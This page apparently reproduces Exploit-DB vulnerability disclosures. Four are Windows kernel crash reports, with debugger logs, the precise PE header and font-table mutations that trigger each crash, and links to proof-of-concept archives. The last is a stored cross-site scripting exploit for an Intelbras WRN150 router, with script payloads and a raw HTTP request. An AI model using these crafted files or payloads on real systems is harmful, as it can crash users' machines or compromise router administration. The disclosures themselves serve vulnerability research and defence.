HireHackking

We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff8007b6e00ac, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffffa8375df1860 -- (.trap 0xfffffa8375df1860) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30 r8=00000000000000c0 r9=fffff8007b6d0080 r10=0000000000000004 r11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz ac po cy CI!CipFixImageType+0x9d: fffff800`79a7e5c1 418b44cb3c mov eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80077ea6642 to fffff80077dc46a0 STACK_TEXT: fffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus fffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12 fffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952 fffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107 fffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171 fffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f fffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360 fffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d fffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279 fffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6 fffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 fffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6 fffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad fffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 fffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 fffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff fffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 fffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39 000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- The direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field. We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9). The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47486.zip

We have encountered a Windows kernel crash in the win32k.sys driver while processing a corrupted TTF font file. An example crash log excerpt generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF900C1E1C003,0x0000000000000001,0xFFFFF9600006D2A8,0x0000000000000000) Driver at fault: *** win32k.sys - Address FFFFF9600006D2A8 base at FFFFF96000010000, DateStamp 5d0c4490 [...] 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff900c1e1c003, memory referenced. Arg2: 0000000000000001, value 0 = read operation, 1 = write operation. Arg3: fffff9600006d2a8, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: fffff880082791f0 -- (.trap 0xfffff880082791f0) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=0000000000000000 rbx=0000000000000000 rcx=fffff900c1e1bfb8 rdx=000000000000000a rsi=0000000000000000 rdi=0000000000000000 rip=fffff9600006d2a8 rsp=fffff88008279380 rbp=000000000000000c r8=fffff960002f5750 r9=0000000000000002 r10=fffff900c1e1bfe9 r11=fffff900c1e1bff3 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc win32k!ulClearTypeFilter+0x214: fffff960`0006d2a8 8807 mov byte ptr [rdi],al ds:00000000`00000000=?? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80002b65a22 to fffff80002ab1520 STACK_TEXT: fffff880`08278928 fffff800`02b65a22 : fffff900`c1e1c003 fffffa80`310f1b50 00000000`00000065 fffff800`02a82658 : nt!RtlpBreakWithStatusInstruction fffff880`08278930 fffff800`02b66812 : fffff880`00000003 fffff880`082791f0 fffff800`02aba420 fffff880`08278f90 : nt!KiBugCheckDebugBreak+0x12 fffff880`08278990 fffff800`02aaada4 : 00000000`00000068 fffff880`08279450 00000000`00010000 00000000`00000000 : nt!KeBugCheck2+0x722 fffff880`08279060 fffff800`02b847b2 : 00000000`00000050 fffff900`c1e1c003 00000000`00000001 fffff880`082791f0 : nt!KeBugCheckEx+0x104 fffff880`082790a0 fffff800`02ab6ddc : 00000000`00000001 fffff900`c1e1c003 00000000`00000000 fffff900`c1e1bf94 : nt!MmAccessFault+0x2322 fffff880`082791f0 fffff960`0006d2a8 : 00000000`00000000 fffff800`00000001 fffff880`08279450 fffff900`c1e1bf94 : nt!KiPageFault+0x35c fffff880`08279380 fffff960`0007097a : fffff900`c1a40010 fffff900`c1a40010 fffff880`08279928 00000000`00000002 : win32k!ulClearTypeFilter+0x214 fffff880`08279400 fffff960`0006ce00 : fffff880`0827b67b fffff880`08279928 fffff900`c1b71010 fffff960`00000b70 : win32k!xInsertMetricsPlusRFONTOBJ+0x20e fffff880`082794d0 fffff960`0006caa0 : fffff880`08279a00 fffff880`08279928 00000000`00000000 00000000`0000000a : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f0 fffff880`08279550 fffff960`0006c498 : 00000000`00000000 fffff880`082796f0 fffff900`c00cb010 00000000`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168 fffff880`082795d0 fffff960`0006d955 : 00000000`41800000 00000000`00000000 00000000`00000007 fffff880`082796f0 : win32k!ESTROBJ::vInit+0x350 fffff880`08279660 fffff960`0006d5f7 : fffff880`08279b60 fffff900`c1a40010 fffffa80`00000020 00000000`ffffffff : win32k!GreGetTextExtentExW+0x275 fffff880`08279920 fffff800`02ab8d53 : 00000000`5a010611 fffff880`00000b40 00000000`00000040 00000000`00000000 : win32k!NtGdiGetTextExtentExW+0x237 fffff880`08279a70 00000000`74da204a : 00000000`74d8c46f 00000000`00010000 00000000`74d8b947 00000000`002ff888 : nt!KiSystemServiceCopyEnd+0x13 00000000`001adca8 00000000`74d8c46f : 00000000`00010000 00000000`74d8b947 00000000`002ff888 00000000`75ad5600 : wow64win!NtGdiGetTextExtentExW+0xa 00000000`001adcb0 00000000`74dcd18f : 00000000`002ff88c 00000000`7efdb000 00000000`7efdb000 00000000`7efdd000 : wow64win!whNtGdiGetTextExtentExW+0x43 00000000`001add00 00000000`74d52776 : 00000000`779a01e4 00000000`74dc0023 00000000`00000246 00000000`002ffeec : wow64!Wow64SystemServiceEx+0xd7 00000000`001ae5c0 00000000`74dcd286 : 00000000`00000000 00000000`74d51920 00000000`777d3128 00000000`7780c4f1 : wow64cpu!ServiceNoTurbo+0x2d 00000000`001ae680 00000000`74dcc69e : 00000000`00000000 00000000`00000000 00000000`74dc4b10 00000000`7ffe0030 : wow64!RunCpuSimulation+0xa 00000000`001ae6d0 00000000`778043c3 : 00000000`004f2d50 00000000`00000000 00000000`77902e70 00000000`777d7550 : wow64!Wow64LdrpInitialize+0x42a 00000000`001aec20 00000000`77869780 : 00000000`00000000 00000000`77876c7d 00000000`001af1d0 00000000`00000000 : ntdll!LdrpInitializeProcess+0x17e3 00000000`001af110 00000000`7781371e : 00000000`001af1d0 00000000`00000000 00000000`7efdf000 00000000`00000000 : ntdll! ?? ::FNODOBFM::`string'+0x22790 00000000`001af180 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!LdrInitializeThunk+0xe --- cut --- The type of the bugcheck implies a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf", "hmtx" and "prep" tables. The issue reproduces on Windows 7 and Windows Server 2008 R2 (64-bit), with and without Special Pools enabled for win32k.sys. Attached is an archive with the proof-of-concept mutated TTF file, the original font used to generate it and the source code of a simple harness program, which loads the given font and displays all of its glyphs at different point sizes on the screen. Running the harness against the provided font is required to trigger the crash, and it only occurs after a few seconds (while processing the 2nd LOGFONT). Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47484.zip

We have encountered a Windows kernel crash in memcpy() called by nt!MiParseImageLoadConfig while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF805751F5000,0x0000000000000000,0xFFFFF805773CF6E5,0x0000000000000000) Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff805751f5000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff805773cf6e5, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffff8380cd506820 -- (.trap 0xffff8380cd506820) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=000000000000005c rbx=0000000000000000 rcx=ffff8380cd506c80 rdx=00007484a7cee364 rsi=0000000000000000 rdi=0000000000000000 rip=fffff805773cf6e5 rsp=ffff8380cd5069b8 rbp=ffff8380cd506fb0 r8=0000000000000008 r9=0000000000000003 r10=000000000000020b r11=ffff8380cd506be0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc nt!memcpy+0xa5: fffff805`773cf6e5 f30f6f4c1110 movdqu xmm1,xmmword ptr [rcx+rdx+10h] ds:fffff805`751f4ff4=???????????????????????????????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff805774a6642 to fffff805773c46a0 STACK_TEXT: ffff8380`cd505dd8 fffff805`774a6642 : fffff805`751f5000 00000000`00000003 ffff8380`cd505f40 fffff805`77322be0 : nt!DbgBreakPointWithStatus ffff8380`cd505de0 fffff805`774a5d32 : fffff805`00000003 ffff8380`cd505f40 fffff805`773d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12 ffff8380`cd505e40 fffff805`773bca07 : fffff078`3c1e0f80 fffff805`774d0110 00000000`00000000 fffff805`77663900 : nt!KeBugCheck2+0x952 ffff8380`cd506540 fffff805`773e0161 : 00000000`00000050 fffff805`751f5000 00000000`00000000 ffff8380`cd506820 : nt!KeBugCheckEx+0x107 ffff8380`cd506580 fffff805`7727aaef : fffff805`77663900 00000000`00000000 00000000`00000000 fffff805`751f5000 : nt!MiSystemFault+0x1d3171 ffff8380`cd506680 fffff805`773ca920 : ffff8380`cd5068b0 fffff805`773caa4e fffff805`75000000 fffff078`3c1f1000 : nt!MmAccessFault+0x34f ffff8380`cd506820 fffff805`773cf6e5 : fffff805`7788397d ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 : nt!KiPageFault+0x360 ffff8380`cd5069b8 fffff805`7788397d : ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 ffff8d03`15cab288 : nt!memcpy+0xa5 ffff8380`cd5069c0 fffff805`7788238e : fffff805`75000000 ffffaf0f`9d705048 00000000`00000000 00000000`001f5000 : nt!MiParseImageLoadConfig+0x171 ffff8380`cd506d40 fffff805`777fc8a3 : ffff8380`cd507180 ffff8380`cd507180 ffff8380`cd506fb0 ffff8380`cd507180 : nt!MiRelocateImage+0x2fe ffff8380`cd506eb0 fffff805`777dca20 : ffff8d03`1526e520 ffff8380`cd507180 ffff8380`cd507180 ffff8d03`1526e4f0 : nt!MiCreateNewSection+0x5ef ffff8380`cd507010 fffff805`777dcd24 : ffff8380`cd507040 ffffaf0f`9d530760 ffff8d03`1526e520 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffff8380`cd507100 fffff805`777dc37f : 00000000`11000000 ffff8380`cd5074c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffff8380`cd507280 fffff805`777dc110 : 000000c1`e89f8e28 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffff8380`cd507360 fffff805`773ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffff8380`cd5073d0 00007ff8`2fa5c9a4 : 00007ff8`2d7c1ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 000000c1`e89f8db8 00007ff8`2d7c1ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 000000c1`e89f8dc0 00007ff8`2d7c5640 : 000001d3`61bac500 0000002e`00000000 00007ff8`2f292770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 000000c1`e89f8ff0 00007ff8`2d7ac41d : 000001d3`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 000000c1`e89f9060 00007ff8`2dd503d1 : 000001d3`61bd1d10 00000000`00000000 000001d3`61bb94d0 00007ff8`2dd66d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 000000c1`e89f90c0 00007ff8`2dd5035c : 00000000`00000000 00007ff8`2ced10ff 000001d3`61bd1d10 000000c1`e89f9410 : shell32!_LoadVersionInfo+0x39 000000c1`e89f9130 00007ff8`2cf4c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c 000000c1`e89f9160 00007ff8`2cee23d4 : 00000000`00000080 00000000`00000000 00000000`80004002 00000000`f20003f1 : windows_storage!InitializeFileHandlerWithFile+0xc9 [...] --- cut --- We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file, which change the Load Configuration Directory address from 0x1e4644 to 0x1f4f44. The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47487.zip

We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below: --- cut --- *** Fatal System Error: 0x00000050 (0xFFFFF80068F02000,0x0000000000000000,0xFFFFF80067291A2C,0x0000000000000000) Driver at fault: *** CI.dll - Address FFFFF80067291A2C base at FFFFF80067230000, DateStamp 8581dc0d . Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. [...] ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff80068f02000, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff80067291a2c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] TRAP_FRAME: ffffe20f4b7d6400 -- (.trap 0xffffe20f4b7d6400) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=00000000000000c8 rbx=0000000000000000 rcx=144670b8d60e0000 rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000 rip=fffff80067291a2c rsp=ffffe20f4b7d6590 rbp=ffffe20f4b7d6690 r8=00000000fffffe00 r9=fffff80068ef0000 r10=0000000000000002 r11=ffffe20f4b7d6760 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc CI!HashKComputeFirstPageHash+0x1f4: fffff800`67291a2c 418b5dd4 mov ebx,dword ptr [r13-2Ch] ds:ffffffff`ffffffd4=???????? Resetting default scope LAST_CONTROL_TRANSFER: from fffff80065aa6642 to fffff800659c46a0 STACK_TEXT: ffffe20f`4b7d59b8 fffff800`65aa6642 : fffff800`68f02000 00000000`00000003 ffffe20f`4b7d5b20 fffff800`65922be0 : nt!DbgBreakPointWithStatus ffffe20f`4b7d59c0 fffff800`65aa5d32 : fffff800`00000003 ffffe20f`4b7d5b20 fffff800`659d0fb0 ffffe20f`4b7d6060 : nt!KiBugCheckDebugBreak+0x12 ffffe20f`4b7d5a20 fffff800`659bca07 : ffff8bc5`e2f17f80 fffff800`65ad0110 00000000`00000000 fffff800`65c63900 : nt!KeBugCheck2+0x952 ffffe20f`4b7d6120 fffff800`659e0161 : 00000000`00000050 fffff800`68f02000 00000000`00000000 ffffe20f`4b7d6400 : nt!KeBugCheckEx+0x107 ffffe20f`4b7d6160 fffff800`6587aaef : fffffb00`023b21b0 00000000`00000000 00000000`00000000 fffff800`68f02000 : nt!MiSystemFault+0x1d3171 ffffe20f`4b7d6260 fffff800`659ca920 : ffffe20f`4b7d6860 00000000`00000000 00000000`00000200 fffff800`65c651c0 : nt!MmAccessFault+0x34f ffffe20f`4b7d6400 fffff800`67291a2c : 00000000`00000000 ffffe20f`4b7d6690 00000000`00000000 00000000`00001000 : nt!KiPageFault+0x360 ffffe20f`4b7d6590 fffff800`67280829 : 00000000`00000000 ffffce0d`8ae71003 ffffac8f`23a2a9e8 00000000`00000000 : CI!HashKComputeFirstPageHash+0x1f4 ffffe20f`4b7d67c0 fffff800`6727f10d : ffffac8f`23a2a5a0 ffffce0d`8ae71080 ffffce0d`00000000 00000000`00000000 : CI!CipGetEmbeddedSignatureAndFindFirstMatch+0x181 ffffe20f`4b7d6860 fffff800`6727e89a : ffffac8f`23a2a5a0 ffffce0d`8b7e1d50 ffffce0d`8ae71080 fffff800`68ef0000 : CI!CipValidatePageHash+0xfd ffffe20f`4b7d6950 fffff800`6727cc8b : fffff800`6727f010 ffffe20f`4b7d6c8c ffffce0d`8b7e1d50 ffffce0d`8ae71080 : CI!CipValidateImageHash+0xe6 ffffe20f`4b7d6a30 fffff800`65e85766 : ffffe20f`4b7d6c70 fffff800`68ef0000 00000000`0000000e fffff800`68ef0000 : CI!CiValidateImageHeader+0x68b ffffe20f`4b7d6bb0 fffff800`65e8528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00012000 : nt!SeValidateImageHeader+0xd6 ffffe20f`4b7d6c60 fffff800`65e1e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436 ffffe20f`4b7d6e50 fffff800`65dfc861 : ffffe20f`4b7d7180 ffffe20f`4b7d6fb0 00000000`40000000 ffffe20f`4b7d7180 : nt!MiValidateSectionSigningPolicy+0xa6 ffffe20f`4b7d6eb0 fffff800`65ddca20 : ffffce0d`8b7e1d50 ffffe20f`4b7d7180 ffffe20f`4b7d7180 ffffce0d`8b7e1d20 : nt!MiCreateNewSection+0x5ad ffffe20f`4b7d7010 fffff800`65ddcd24 : ffffe20f`4b7d7040 ffffac8f`2af6a9f0 ffffce0d`8b7e1d50 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0 ffffe20f`4b7d7100 fffff800`65ddc37f : 00000000`11000000 ffffe20f`4b7d74c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4 ffffe20f`4b7d7280 fffff800`65ddc110 : 00000010`0e3f8dc8 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff ffffe20f`4b7d7360 fffff800`659ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60 ffffe20f`4b7d73d0 00007ffe`c317c9a4 : 00007ffe`c0511ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25 00000010`0e3f8d58 00007ffe`c0511ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14 00000010`0e3f8d60 00007ffe`c0515640 : 00000129`5f442be0 0000001b`00000000 00007ffe`c1f72770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7 00000010`0e3f8f90 00007ffe`c04fc41d : 00000129`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0 00000010`0e3f9000 00007ffe`c16903d1 : 00000129`5f414f00 00000000`00000000 00000129`5f443840 00007ffe`c16a6d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d 00000010`0e3f9060 00007ffe`c169035c : 00000000`00000000 00007ffe`c08710ff 00000129`5f414f00 00000010`0e3f93b0 : shell32!_LoadVersionInfo+0x39 00000010`0e3f90d0 00007ffe`c08ec1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c [...] --- cut --- We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which decreases NumberOfSections from 4 to 3, one which increases SizeOfOptionalHeader from 0xF0 to 0xCEF0, and one which changes DllCharacteristics from 0 to 0x00FF (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | 0xf). The issue reproduces on Windows 10 and Windows Server 2019 64-bit (Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive. Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and one additional non-minimized sample. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47488.zip

# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting # Date: 2019-10-03 # Exploit Author: Prof. Joas Antonio # Vendor Homepage: https://www.intelbras.com/pt-br/ # Software Link: http://en.intelbras.com.br/node/25896 # Version: 1.0.18 # Tested on: Windows # CVE : CVE-2019–17411 # PoC 1: 1) Login to your router 2) After signing in as WAN Settings 3) Select for PPPOE mode 4) In the Service Name and Server Name field, enter any of these payloads: <script> alert ("Hacked") </script> <script> alert (1) </script> # PoC burp.txt POST /goform/AdvSetWan HTTP/1.1 Host: TARGET Content-Length: 281 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://TARGET/wan_connected.asp Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt Connection: close

